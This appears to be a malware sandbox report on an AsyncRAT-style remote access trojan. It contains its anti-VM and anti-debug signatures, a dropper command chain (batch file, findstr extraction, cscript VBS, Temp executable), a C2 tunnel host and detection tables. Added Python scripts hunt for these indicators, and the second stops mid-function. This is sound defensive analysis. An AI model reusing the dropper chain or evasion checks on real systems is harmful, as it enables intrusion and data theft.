Source: C:\Users\user\Desktop\x.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Window / User API: threadDelayed 9759
Source: C:\Users\user\Desktop\x.exe TID: 6416 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2616 :: Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\x.exe :: WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe :: Last function: Thread delayed (2 times)
Source: C:\Users\user\AppData\Local\Temp\x.exe :: File Volume queried: C:\ FullSizeInformation (5 times)
Source: C:\Users\user\Desktop\x.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Thread delayed: delay time: 922337203685477
Source: Amcache.hve.11.dr :: Binary or memory string: VMware
Source: Amcache.hve.11.dr :: Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr :: Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr :: Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr :: Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr :: Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr :: Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr :: Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr :: Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr :: Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.11.dr :: Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr :: Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: x.exe, 00000007.00000002.3113363388.000000001B750000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.11.dr :: Binary or memory string: vmci.sys
Source: Amcache.hve.11.dr :: Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.11.dr :: Binary or memory string: vmci.syshbin`
Source: x.exe.6.dr :: Binary or memory string: vmware
Source: Amcache.hve.11.dr :: Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.11.dr :: Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr :: Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr :: Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr :: Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr :: Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr :: Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr :: Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr :: Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr :: Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.11.dr :: Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr :: Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr :: Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr :: Binary or memory string: vmci.inf_amd64_68ed49469341f563
Note: the Amcache.hve.11.dr entries above are strings from the analysis machine's own Amcache registry hive, captured here as a dropped file; they describe the VMware sandbox hardware, not strings carried by the sample. Only the x.exe entries (SBIEDLL.DLL, vmware, Hyper-V RAW) come from the sample's own image and memory.

                      Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\x.exe :: Code function: 7_2_00007FF847027301 CheckRemoteDebuggerPresent, 7_2_00007FF847027301
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Process queried: DebugPort (3 times)
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Process token adjusted: Debug (2 times)
Source: C:\Users\user\Desktop\x.exe :: Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\x.exe :: Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "
Source: C:\Windows\System32\cmd.exe :: Process created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"
Source: C:\Windows\System32\cmd.exe :: Process created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
Source: C:\Windows\System32\cmd.exe :: Process created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Users\user\Desktop\x.exe :: Queries volume information: C:\Users\user\Desktop\x.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.11.dr :: Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr :: Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr :: Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: x.exe, 00000007.00000002.3113363388.000000001B750000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3113363388.000000001B807000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.11.dr :: Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe :: WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct (4 times)

                      Stealing of Sensitive Information

Source: Yara match :: File source: 6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f936cf80.5.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 7.2.x.exe.128a1a78.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.2.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.3.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8e09dd0.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8e09dd0.4.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: Process Memory Space: cscript.exe PID: 1272, type: MEMORYSTR
Source: Yara match :: File source: Process Memory Space: x.exe PID: 5808, type: MEMORYSTR
Source: Yara match :: File source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPED
Source: Yara match :: File source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

                      Remote Access Functionality

Source: Yara match :: File source: 6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f936cf80.5.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 7.2.x.exe.128a1a78.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.2.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.3.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8e09dd0.0.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8d843d0.1.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 6.3.cscript.exe.2a3f8e09dd0.4.unpack, type: UNPACKEDPE
Source: Yara match :: File source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: Process Memory Space: cscript.exe PID: 1272, type: MEMORYSTR
Source: Yara match :: File source: Process Memory Space: x.exe PID: 5808, type: MEMORYSTR
Source: Yara match :: File source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPED
Source: Yara match :: File source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
MITRE ATT&CK Matrix (reconstructed from the flattened 14-column table; the digits in front of a technique are the badge counts of matched signatures displayed in the original matrix, techniques without digits are unmatched placeholder cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 22 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 12 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 22 Scripting; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 111 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 541 Security Software Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 23 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (text rendering of the graph; node numbers and layout tokens dropped)
Behavior Graph ID: 1504726  Sample: x.exe  Start date: 05/09/2024  Architecture: WINDOWS  Score: 100
Contacted hosts: ip-api.com; character-acquisitions.gl.at.ply.gg
Global signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 21 other signatures

x.exe (C:\Users\user\Desktop\x.exe, started)
  dropped: C:\Users\user\AppData\Local\...\4EuTqZFB.bat (DOS); C:\Users\user\AppData\Local\...\x.exe.log (CSV)
  -> conhost.exe
  -> cmd.exe
     dropped: C:\Users\user\AppData\Local\Temp\x.vbs (ASCII); C:\Users\user\AppData\Local\Temp\x (ASCII)
     signatures: Potential malicious VBS script found (has network functionality); Command shell drops VBS files
     -> conhost.exe
     -> findstr.exe
     -> cscript.exe
        dropped: C:\Users\user\AppData\Local\Temp\x.exe (PE32)
        signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
     -> x.exe (C:\Users\user\AppData\Local\Temp\x.exe)
        network: ip-api.com 208.95.112.1 (ports 49720, 80; TUT-AS, US, United States); character-acquisitions.gl.at.ply.gg 147.185.221.17 (ports 36301, 49722, 49727; SALSGIVER, US, United States); 127.0.0.1 (unknown)
        dropped: C:\ProgramData\Hoodbyunlock.exe (PE32)
        signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 3 other signatures
        -> WerFault.exe
           dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
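The execution chain and network contacts in this report (cmd.exe running the dropped batch file, findstr cutting the payload lines out of it, cscript executing x.vbs from Temp, the Temp-resident x.exe asking ip-api.com for the hosting flag and then connecting to a gl.at.ply.gg host on port 36301) are the parts that translate most directly into hunting logic. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it scores constructed process-creation and connection records modelled on the report's entries and turns them into a host verdict. The record field names (image, cmdline, parent_image, host, port, url) are assumptions for the example, and the ply.gg check treats the C2 host as a playit.gg tunnel endpoint, which its hostname suffix indicates.

```python
"""Hunting logic derived from this report's execution chain and network contacts.

Added example (not code from the Joe Sandbox report or from the sample).
The event records below are constructed to mirror the report's process tree
and traffic; the field names are assumptions for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str         # full path of the created process
    cmdline: str       # its command line
    parent_image: str  # full path of the parent process


@dataclass
class NetEvent:
    image: str         # process that opened the connection
    host: str          # destination host name
    port: int          # destination port
    url: str = ""      # full URL when the connection carried plain HTTP


# any path under %LOCALAPPDATA%\Temp, where every stage of this chain lives
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# playit.gg tunnel endpoints (the C2 host in this report ends in gl.at.ply.gg)
TUNNEL_RE = re.compile(r"\.ply\.gg$", re.IGNORECASE)

# the four process-creation steps of the observed chain, in order
CHAIN = (
    "cmd.exe runs a batch file from Temp",
    "findstr extracts payload lines from the batch file",
    "script host executes a VBS from Temp",
    "cmd.exe launches a PE from Temp",
)


def score_process(ev: ProcEvent) -> list[str]:
    """Return the chain steps a single process-creation record matches."""
    img, parent, cmd = ev.image.lower(), ev.parent_image.lower(), ev.cmdline.lower()
    hits = []
    if img.endswith("\\cmd.exe") and ".bat" in cmd and TEMP_RE.search(cmd):
        hits.append(CHAIN[0])
    # findstr /e "<marker>" <bat>: the batch file carries its payload as tagged
    # lines and uses findstr to cut them out (the Bat2Exe style of dropper)
    if img.endswith("\\findstr.exe") and parent.endswith("\\cmd.exe") and " /e " in cmd and ".bat" in cmd:
        hits.append(CHAIN[1])
    if img.endswith(("\\cscript.exe", "\\wscript.exe")) and ".vbs" in cmd and TEMP_RE.search(cmd):
        hits.append(CHAIN[2])
    if TEMP_RE.search(img) and img.endswith(".exe") and parent.endswith("\\cmd.exe"):
        hits.append(CHAIN[3])
    return hits


def score_network(ev: NetEvent) -> list[str]:
    """Return the network indicators a single connection record matches."""
    hits = []
    if ev.host.lower() == "ip-api.com" and "fields=hosting" in ev.url.lower():
        hits.append("hosting/datacenter lookup via ip-api.com")
    if TUNNEL_RE.search(ev.host):
        hits.append("connection to a playit.gg tunnel endpoint")
    if TEMP_RE.search(ev.image) and ev.port not in (80, 443):
        hits.append("Temp-resident process talks to a non-standard port")
    return hits


def triage(procs: list[ProcEvent], nets: list[NetEvent]) -> dict:
    """Combine per-event hits into a verdict for the host."""
    proc_hits = {h for ev in procs for h in score_process(ev)}
    net_hits = {h for ev in nets for h in score_network(ev)}
    chain_complete = all(step in proc_hits for step in CHAIN)
    c2 = "connection to a playit.gg tunnel endpoint" in net_hits
    if chain_complete and c2:
        verdict = "malicious"
    elif proc_hits or net_hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "process_hits": sorted(proc_hits),
        "network_hits": sorted(net_hits),
        "chain_complete": chain_complete,
        "verdict": verdict,
    }


# constructed records mirroring the report's process tree and traffic
TEMP = r"C:\Users\user\AppData\Local\Temp"
PROC_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              rf'C:\Windows\system32\cmd.exe /c ""{TEMP}\4EuTqZFB.bat" "',
              r"C:\Users\user\Desktop\x.exe"),
    ProcEvent(r"C:\Windows\System32\findstr.exe",
              rf'''findstr /e "'v" "{TEMP}\4EuTqZFB.bat"''',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              rf"cscript //nologo {TEMP}\x.vbs",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(rf"{TEMP}\x.exe", rf"{TEMP}\x.exe", r"C:\Windows\System32\cmd.exe"),
    # benign control record
    ProcEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),
]
NET_EVENTS = [
    NetEvent(rf"{TEMP}\x.exe", "ip-api.com", 80, "http://ip-api.com/line/?fields=hosting"),
    NetEvent(rf"{TEMP}\x.exe", "character-acquisitions.gl.at.ply.gg", 36301),
    # benign control record
    NetEvent(r"C:\Windows\System32\svchost.exe", "bg.microsoft.map.fastly.net", 443),
]

if __name__ == "__main__":
    for key, value in triage(PROC_EVENTS, NET_EVENTS).items():
        print(f"{key}: {value}")
```

The verdict is deliberately two-tiered: the chain steps on their own are common to many batch-to-VBS droppers, so a single hit only raises "suspicious", while the full four-step chain together with a tunnel-endpoint connection is what this report actually shows and is scored "malicious". The ip-api.com hosting lookup is kept as its own indicator because the sample uses the answer to decide whether it is running in a datacenter sandbox, which makes that request a useful early signal in proxy logs.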

Initial Sample
Source | Detection | Scanner | Label
x.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Marsilia
x.exe | 56% | Virustotal |
x.exe | 100% | Avira | HEUR/AGEN.1306491
x.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\ProgramData\Hoodbyunlock.exe | 100% | Avira | TR/Agent.hcyxx
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | TR/Agent.hcyxx
C:\ProgramData\Hoodbyunlock.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Hoodbyunlock.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\ProgramData\Hoodbyunlock.exe | 77% | Virustotal |
C:\Users\user\AppData\Local\Temp\x.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Temp\x.exe | 77% | Virustotal |

Unpacked PE Files
No Antivirus matches

Domains
Source | Detection | Scanner
bg.microsoft.map.fastly.net | 0% | Virustotal
character-acquisitions.gl.at.ply.gg | 10% | Virustotal
ip-api.com | 0% | Virustotal

URLs
Source | Detection | Scanner | Label
character-acquisitions.gl.at.ply.gg | 100% | Avira URL Cloud | malware
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | Avira URL Cloud | safe
http://upx.sf.net | 0% | Avira URL Cloud | safe
127.0.0.1 | 0% | Avira URL Cloud | safe
https://github.com/dehoisted/Bat2Exeg | 0% | Avira URL Cloud | safe
character-acquisitions.gl.at.ply.gg | 10% | Virustotal |
http://upx.sf.net | 0% | Virustotal |
https://github.com/dehoisted/Bat2Exeg | 0% | Virustotal |
http://ip-api.com/line/?fields=hosting | 0% | Avira URL Cloud | safe
http://ip-api.com | 0% | Avira URL Cloud | safe
https://github.com/dehoisted/Bat2Exe | 0% | Avira URL Cloud | safe
127.0.0.1 | 0% | Virustotal |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | Virustotal |
https://github.com/dehoisted/Bat2Exe | 0% | Virustotal |
http://ip-api.com/line/?fields=hosting | 1% | Virustotal |
http://ip-api.com | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
character-acquisitions.gl.at.ply.gg | 147.185.221.17 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
character-acquisitions.gl.at.ply.gg | true | 10% Virustotal; Avira URL Cloud: malware | unknown
127.0.0.1 | true | 0% Virustotal; Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | 1% Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://upx.sf.net | Amcache.hve.11.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://github.com/dehoisted/Bat2Exeg | x.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://ip-api.com | x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://github.com/dehoisted/Bat2Exe | x.exe, 00000000.00000002.2152277122.0000000003071000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
147.185.221.17 | character-acquisitions.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
IP
127.0.0.1
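The contacted-host tables above record two behaviours that are worth correlating in network telemetry rather than alerting on separately: the ip-api.com hosting lookup (the data-centre check the sample uses to decide whether it is running in an analysis environment) and the connection to the C2 tunnel endpoint character-acquisitions.gl.at.ply.gg on 147.185.221.17. The script below is an added example, not part of the Joe Sandbox report, that runs that correlation over a few constructed Zeek-style log lines. The indicator values are taken from the tables above; the log lines, the 10-minute window, the severity labels and the assumption that other *.ply.gg subdomains belong to the same tunnelling service are mine.

```python
"""Correlate the sample's sandbox check (ip-api.com hosting lookup) with
its C2 contact (ply.gg tunnel endpoint) per source host.

A geolocation lookup on its own is weak evidence; the lookup followed
within minutes by a connection to a tunnelling endpoint from the same
host is the XWorm pattern recorded in this report.
"""
from typing import Optional

# Indicators taken from the report's contacted-host tables.
GEO_CHECK_HOST = "ip-api.com"
GEO_CHECK_PATHS = ("/line/?fields=hosting", "/json/")
C2_HOSTS = {"character-acquisitions.gl.at.ply.gg"}
C2_IPS = {"147.185.221.17"}
# Assumption (not stated in the report): ply.gg is a public tunnelling
# service, so any other subdomain is flagged at a lower severity.
TUNNEL_SUFFIX = ".ply.gg"

SEVERITY = {"geo_hosting_check": "low", "tunnel_suffix": "medium",
            "c2_contact": "high", "geo_check_then_c2": "critical"}

# Constructed log lines (not from the report). Tab-separated:
# ts, src, dst, host, uri. "-" marks a missing field (bare TCP flow).
SAMPLE_LOG = """\
1725527711.1\t10.0.0.5\t208.95.112.1\tip-api.com\t/line/?fields=hosting
1725527713.4\t10.0.0.5\t147.185.221.17\tcharacter-acquisitions.gl.at.ply.gg\t-
1725527800.0\t10.0.0.9\t208.95.112.1\tip-api.com\t/json/
1725531400.0\t10.0.0.9\t147.185.221.17\t-\t-
1725527900.0\t10.0.0.7\t93.184.216.34\texample.com\t/
1725528000.0\t10.0.0.11\t147.185.221.20\tother-tunnel.gl.at.ply.gg\t-
"""


def parse_log(text: str) -> list:
    """Parse the tab layout above into dicts, ordered by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, host, uri = line.split("\t")
        events.append({
            "ts": float(ts), "src": src, "dst": dst,
            "host": None if host == "-" else host.lower(),
            "uri": None if uri == "-" else uri,
        })
    return sorted(events, key=lambda e: e["ts"])


def classify(ev: dict) -> Optional[str]:
    """Map one event to an indicator class, or None if nothing matches."""
    if (ev["host"] == GEO_CHECK_HOST and ev["uri"]
            and ev["uri"].startswith(GEO_CHECK_PATHS)):
        return "geo_hosting_check"
    if ev["host"] in C2_HOSTS or ev["dst"] in C2_IPS:
        return "c2_contact"
    if ev["host"] and ev["host"].endswith(TUNNEL_SUFFIX):
        return "tunnel_suffix"
    return None


def correlate(text: str, window: float = 600.0) -> list:
    """One alert per matching event, plus a 'geo_check_then_c2' alert when a
    host reaches a C2/tunnel endpoint within `window` seconds of its most
    recent hosting lookup."""
    alerts = []
    last_geo_check = {}  # src -> ts of the most recent hosting lookup
    for ev in parse_log(text):
        kind = classify(ev)
        if kind is None:
            continue
        alerts.append({"kind": kind, "severity": SEVERITY[kind],
                       "src": ev["src"], "dst": ev["dst"], "ts": ev["ts"]})
        if kind == "geo_hosting_check":
            last_geo_check[ev["src"]] = ev["ts"]
            continue
        seen = last_geo_check.get(ev["src"])
        if seen is not None and 0 <= ev["ts"] - seen <= window:
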